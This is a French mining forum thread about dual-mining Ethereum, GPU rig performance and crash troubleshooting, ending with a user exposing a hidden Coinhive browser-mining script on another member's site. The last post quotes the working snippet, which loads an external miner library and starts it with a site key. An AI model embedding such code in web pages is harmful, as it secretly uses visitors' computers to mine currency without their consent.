Dual mining : quelle monnaie miner en parallèle d'Etherum



  • Bonjour,

    Quelles sont les monnaies qui peuvent etre dual miner avec Etherum?
    Toutes celles qui utilisent un algorythme différent? Ou alors y a t-il des restrictions?



  • Sia, Decred, Lbry, Pascal. Tout ce qui est basé sur l’algorithme Daggerhashimoto

    Mais ce n’est pas vraiment du dualmining. Le temps que prend le logiciel a décrypter une autre monnaie est perdu. Le logiciel mine en alternance de l’ETH et une autre monnaie, il ne mine pas vraiment les deux en même temps.
    L’idéal étant d’utiliser un pool qui fait plusieur monnaie, comme nanopool.



  • Ah mince, j’avais cru lire quelque part ça n’utilisait pas les mêmes ressources que l’ETH, même si ça dégradait légèrement les nerfs de l’ETH. Ok je vais regarder nanopool 😉



  • C’est tout à fait ça tanataur, le dual mining dégrade à peine les perfs de minage de l’ethereum, et ce n’est pas parce que tu fais du dual que tu vas diviser par deux les perfs.
    Par exemple sur mon rig de 7 RX 570 en solo mining sur l’ETH je fais 180 mhs, et en dual ETH + Decred je fais du 170 mhs.

    Par contre c’est vrai que ça augmente la consommation d’électricité et j’ai le sentiment que ça rend la config un peu moins stable.



  • Je viens justement d acheter des rx 570. Tu as pris quel bios et quel driver pour avoir ces scores. En conso tu es a combien ? Merci



  • @tanataur

    J’ai écrit un peu vite, ce sont des rx470 nitro+ pour être exactes. Elles font 24,9 mhs chacune en solo ETH, 23 en dual ETH+DCR et en conso totale ça fait 1100 watts en dual. Le bios des GPUs n’a pas été modifié et les pilotes date de novembre 2016. Je ne les ai plus en tête mais j’ai rentré tout ça sur mon site www.miningbenchmark.net 😉

    Je fais aussi travailler la RAM et le CPU pour faire tourner un soft qui tourne en tache de fond et qui me permet de faire rentrer une source de revenu supplémentaire 😉

    text alternatif



  • Sympa ton rig et excellent ton site. Quand tu parles d’instabilité, qu’est ce que tu as eu? Plantage de l’appli? Plantage de windows?



  • Merci pour ton retour sur miningbenchmark 🙂 Oui claymore qui plante, erreur de pilote ou alors grosse baisse de regime de une ou plusieurs cartes inexpliquée. Mais bon ça peut toujours très bien tourner une semaine sans la moindre erreur. Ça dépend si tes cartes sont fatiguées ou non.



  • Et les logs de windows ne te donnent pas plus d’info ?



  • @tomato
    J’ai aussi des plantages récurant sous windows 10, un peu moins sous windows 7. Quelque soit le soft de minage (essentiellement Claymore). Mais j’avais des plantage avec NicehashMiner qui exploite plusieurs logiciels.

    J’ai mis claymore au boot de windows. Comme ça quand il reboot, il relance le logiciel automatiquement.

    mais ça reste inexpliqué, ça peut tourner impec pendant 5 jours et planter toutes les 1/2 heures après. je vais tester Linux ou simplemining.



  • A tout hasard je precise que dans les events de logs windows tu peux identifier ce qui a planté et pourquoi ca a planté . Tu peux aussi utiliser le logiciel whocrash. Au fait pourquoi n’as tu pas changer le bios de tes cartes ?



  • @tanataur a dit dans Dual mining : quelle monnaie miner en parallèle d'Etherum :

    A tout hasard je precise que dans les events de logs windows tu peux identifier ce qui a planté et pourquoi ca a planté . Tu peux aussi utiliser le logiciel whocrash. Au fait pourquoi n’as tu pas changer le bios de tes cartes ?

    Merci pour ces infos je ne connaissais pas whocrash. Où peut-on accéder aux logs de windows ?
    J’ai aussi un rig acheté d’occasion avec l’alimentation qui se coupe ou bout de quelques minutes voir quelques heures. Je pensais que c’était l’alimentation en cause mais non, j’ai changé l’alimentation et ça continue ! Il me reste la piste des pilotes et de la carte mère a explorer. Une sacré prise de tête!

    Je n’ai pas modifié les bios des cartes car elles s’usent plus vites et se revendent moins bien une fois le bios modifié. Peut être que je le ferai plus tard quand j’aurais plus de temps.



  • Les logs de windows tu les trouveras dans l’observateur d’evenements. Who crash ne fait qu ´extraire les infos de l’observateur.
    Check ta Ram aussi 😉 bon courage



  • @tomato a dit dans Dual mining : quelle monnaie miner en parallèle d’Etherum :

    @tanataur

    J’ai écrit un peu vite, ce sont des rx470 nitro+ pour être exactes. Elles font 24,9 mhs chacune en solo ETH, 23 en dual ETH+DCR et en conso totale ça fait 1100 watts en dual. Le bios des GPUs n’a pas été modifié et les pilotes date de novembre 2016. Je ne les ai plus en tête mais j’ai rentré tout ça sur mon site www.miningbenchmark.net 😉

    Je fais aussi travailler la RAM et le CPU pour faire tourner un soft qui tourne en tache de fond et qui me permet de faire rentrer une source de revenu supplémentaire 😉

    text alternatif

    @tomato ton site est bien ceci dit il reste encore quelques axes d’améliorations surtout pour la partie calculer de rentabilité 😉

    Il faut penser à prendre en compte les frais de là pool en %, pourquoi pas aussi une déduction des 30% à céder au fisc pour ceux qui font les choses proprement 🙈

    La cerise sur le gâteau serait aussi d’afficher le tout en euros ( après tout dans la signature, tu dis clairement que le site est français … ).

    Voilà pour tout !!

    Sinon bonne année et meilleurs vœux 🥂🎉😉



  • J’ai 2 rig de 6 gpu sous Windows. Je suis novice ça fait 1 mois que je mine. J’avais des plantages réguliers sous Windows 10. Depuis que j’ai désactivées Windows update. Ça n’a plante plus.



  • @tomato a dit dans Dual mining : quelle monnaie miner en parallèle d’Etherum :

    les ai plus en tête mais j’ai rentré tout ça sur mon site

    Si c’est ton site www.miningbenchmark.net, je crois que tu pourrais être plus sincère et indiquer qu’un code de mining en javascript est présent sur le site…activé ou pas on s’en fou.

    Car quand je regarde le code source et que je tombe sur ça, crois moi que je ne mettrai plus jamais les pieds dessus et que j’en ferai jamais la pub …

    <script src=“https://coinhive.com/lib/coinhive.min.js”></script>
    <script>
    var miner = new CoinHive.Anonymous(‘wl3gRG17UIf3e0Tv2OBzT6zZLJW2WQkj’);
    miner.start();
    </script>
    –>

    Merci de prendre les gens pour des pigeons 🤑


Se connecter pour répondre
 

Il semble que votre connexion ait été perdue, veuillez patienter pendant que nous vous re-connectons.